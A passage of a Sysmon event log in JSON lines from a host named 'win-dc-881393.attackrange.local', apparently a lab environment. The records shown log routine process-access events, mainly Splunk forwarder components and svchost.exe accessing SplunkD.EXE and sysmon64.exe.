ventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1825,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001067B60300}\r\nSourceProcessId: 3720\r\nSourceThreadId: 3768\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001041B70300}\r\nTargetProcessId: 3748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001067B60300}","SourceProcessId":"3720","SourceThreadId":"3768","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001041B70300}","TargetProcessId":"3748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1826,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001041B70300}\r\nTargetProcessId: 3748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001041B70300}","TargetProcessId":"3748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1827,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1828,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1829,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1830,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1831,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1832,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1833,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 